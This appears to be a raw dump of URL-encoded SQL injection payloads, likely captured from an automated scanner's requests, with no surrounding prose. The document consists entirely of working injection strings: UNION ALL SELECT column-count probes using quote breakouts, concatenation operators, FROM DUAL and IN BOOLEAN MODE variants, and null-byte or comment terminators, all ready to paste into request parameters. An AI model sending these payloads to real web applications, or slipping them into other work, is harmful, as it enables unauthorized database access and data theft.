-4579%27%20%7C%7C%20%28SELECT%202765%20WHERE%202142%3D2142%20UNION%20ALL%20SELECT%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%00%20%29%20%7C%7C%20%27 -6826%27%20%7C%7C%20%28SELECT%202673%20WHERE%204463%3D4463%20UNION%20ALL%20SELECT%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%2C%204463%00%20%29%20%7C%7C%20%27 -8372%27%20%7C%7C%20%28SELECT%209243%20WHERE%201031%3D1031%20UNION%20ALL%20SELECT%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%00%20%29%20%7C%7C%20%27 -8182%27%20%7C%7C%20%28SELECT%203609%20WHERE%203201%3D3201%20UNION%20ALL%20SELECT%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%00%20%29%20%7C%7C%20%27 -3598%27%20%7C%7C%20%28SELECT%208445%20WHERE%207405%3D7405%20UNION%20ALL%20SELECT%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%2C%207405%00%20%29%20%7C%7C%20%27 -3740%27%20%7C%7C%20%28SELECT%207757%20WHERE%206933%3D6933%20UNION%20ALL%20SELECT%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%2C%206933%00%20%29%20%7C%7C%20%27 -3425%20%2B%20%28SELECT%204884%20FROM%20DUAL%20WHERE%207648%3D7648%20UNION%20ALL%20SELECT%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%2C%207648%00%20%29 -8937%20%2B%20%28SELECT%203766%20FROM%20DUAL%20WHERE%209713%3D9713%20UNION%20ALL%20SELECT%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%2C%209713%00%20%29 -1667%20%2B%20%28SELECT%208616%20FROM%20DUAL%20WHERE%206316%3D6316%20UNION%20ALL%20SELECT%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%2C%206316%00%20%29 -4699%20%2B%20%28SELECT%205315%20FROM%20DUAL%20WHERE%209173%3D9173%20UNION%20ALL%20SELECT%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%2C%209173%00%20%29 -3498%20%2B%20%28SELECT%202822%20FROM%20DUAL%20WHERE%208627%3D8627%20UNION%20ALL%20SELECT%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%2C%208627%00%20%29 -3054%20%2B%20%28SELECT%206273%20FROM%20DUAL%20WHERE%205755%3D5755%20UNION%20ALL%20SELECT%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%2C%205755%00%20%29 -3323%20%2B%20%28SELECT%203565%20FROM%20DUAL%20WHERE%204117%3D4117%20UNION%20ALL%20SELECT%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%2C%204117%00%20%29 -8355%20%2B%20%28SELECT%205807%20FROM%20DUAL%20WHERE%208492%3D8492%20UNION%20ALL%20SELECT%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%2C%208492%00%20%29 -7261%20%2B%20%28SELECT%201298%20FROM%20DUAL%20WHERE%204244%3D4244%20UNION%20ALL%20SELECT%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%2C%204244%00%20%29 -5613%20%2B%20%28SELECT%205102%20FROM%20DUAL%20WHERE%209863%3D9863%20UNION%20ALL%20SELECT%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%2C%209863%00%20%29 -5040%20%2B%20%28SELECT%205715%20WHERE%207649%3D7649%20UNION%20ALL%20SELECT%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%2C%207649%00%20%29 -6607%20%2B%20%28SELECT%204586%20WHERE%207753%3D7753%20UNION%20ALL%20SELECT%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%2C%207753%00%20%29 -1324%20%2B%20%28SELECT%201117%20WHERE%204391%3D4391%20UNION%20ALL%20SELECT%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%2C%204391%00%20%29 -5005%20%2B%20%28SELECT%207198%20WHERE%201924%3D1924%20UNION%20ALL%20SELECT%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%00%20%29 -9631%20%2B%20%28SELECT%206130%20WHERE%205992%3D5992%20UNION%20ALL%20SELECT%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%2C%205992%00%20%29 -5080%20%2B%20%28SELECT%202197%20WHERE%207927%3D7927%20UNION%20ALL%20SELECT%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%2C%207927%00%20%29 -4229%20%2B%20%28SELECT%204130%20WHERE%209584%3D9584%20UNION%20ALL%20SELECT%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%2C%209584%00%20%29 -1118%20%2B%20%28SELECT%204687%20WHERE%208112%3D8112%20UNION%20ALL%20SELECT%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%2C%208112%00%20%29 -1572%20%2B%20%28SELECT%209069%20WHERE%203511%3D3511%20UNION%20ALL%20SELECT%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%2C%203511%00%20%29 -8205%20%2B%20%28SELECT%206328%20WHERE%206636%3D6636%20UNION%20ALL%20SELECT%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%00%20%29 -2834%27%20%2B%20%28SELECT%20%27WIur%27%20FROM%20DUAL%20WHERE%202861%3D2861%20UNION%20ALL%20SELECT%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%2C%202861%00%20%29%20%2B%20%27 -9496%27%20%2B%20%28SELECT%20%27DsLr%27%20FROM%20DUAL%20WHERE%201002%3D1002%20UNION%20ALL%20SELECT%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%00%20%29%20%2B%20%27 -1831%27%20%2B%20%28SELECT%20%27JpJU%27%20FROM%20DUAL%20WHERE%201157%3D1157%20UNION%20ALL%20SELECT%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%2C%201157%00%20%29%20%2B%20%27 -2858%27%20%2B%20%28SELECT%20%27SAqa%27%20FROM%20DUAL%20WHERE%207997%3D7997%20UNION%20ALL%20SELECT%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%2C%207997%00%20%29%20%2B%20%27 -6932%27%20%2B%20%28SELECT%20%27SpYt%27%20FROM%20DUAL%20WHERE%201683%3D1683%20UNION%20ALL%20SELECT%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%2C%201683%00%20%29%20%2B%20%27 -4191%27%20%2B%20%28SELECT%20%27ksQD%27%20FROM%20DUAL%20WHERE%208439%3D8439%20UNION%20ALL%20SELECT%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%2C%208439%00%20%29%20%2B%20%27 -8569%27%20%2B%20%28SELECT%20%27NclS%27%20FROM%20DUAL%20WHERE%207779%3D7779%20UNION%20ALL%20SELECT%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%2C%207779%00%20%29%20%2B%20%27 -8539%27%20%2B%20%28SELECT%20%27HLnN%27%20FROM%20DUAL%20WHERE%203352%3D3352%20UNION%20ALL%20SELECT%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%00%20%29%20%2B%20%27 -5536%27%20%2B%20%28SELECT%20%27PcUN%27%20FROM%20DUAL%20WHERE%207732%3D7732%20UNION%20ALL%20SELECT%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%00%20%29%20%2B%20%27 -5253%27%20%2B%20%28SELECT%20%27BLNt%27%20FROM%20DUAL%20WHERE%204118%3D4118%20UNION%20ALL%20SELECT%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%2C%204118%00%20%29%20%2B%20%27 -3922%27%20%2B%20%28SELECT%20%27NMwQ%27%20WHERE%208950%3D8950%20UNION%20ALL%20SELECT%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%2C%208950%00%20%29%20%2B%20%27 -4539%27%20%2B%20%28SELECT%20%27fVCM%27%20WHERE%202001%3D2001%20UNION%20ALL%20SELECT%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%00%20%29%20%2B%20%27 -5073%27%20%2B%20%28SELECT%20%27iwtp%27%20WHERE%206694%3D6694%20UNION%20ALL%20SELECT%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%2C%206694%00%20%29%20%2B%20%27 -9984%27%20%2B%20%28SELECT%20%27mWOj%27%20WHERE%205950%3D5950%20UNION%20ALL%20SELECT%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%00%20%29%20%2B%20%27 -4018%27%20%2B%20%28SELECT%20%27Gpvt%27%20WHERE%203597%3D3597%20UNION%20ALL%20SELECT%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%2C%203597%00%20%29%20%2B%20%27 -7724%27%20%2B%20%28SELECT%20%27nbsX%27%20WHERE%203790%3D3790%20UNION%20ALL%20SELECT%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%2C%203790%00%20%29%20%2B%20%27 -7052%27%20%2B%20%28SELECT%20%27TCSG%27%20WHERE%209245%3D9245%20UNION%20ALL%20SELECT%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%2C%209245%00%20%29%20%2B%20%27 -5885%27%20%2B%20%28SELECT%20%27uOpI%27%20WHERE%202381%3D2381%20UNION%20ALL%20SELECT%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%00%20%29%20%2B%20%27 -2508%27%20%2B%20%28SELECT%20%27cZys%27%20WHERE%203579%3D3579%20UNION%20ALL%20SELECT%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%2C%203579%00%20%29%20%2B%20%27 -1471%27%20%2B%20%28SELECT%20%27WrNc%27%20WHERE%207684%3D7684%20UNION%20ALL%20SELECT%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%2C%207684%00%20%29%20%2B%20%27 -1707%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%2C%201777%00%20%23 -4742%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%00%20%23 -5861%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%2C%202166%00%20%23 -9583%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%2C%206777%00%20%23 -4391%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%2C%201668%00%20%23 -6730%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%2C%204425%00%20%23 -2155%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%2C%205837%00%20%23 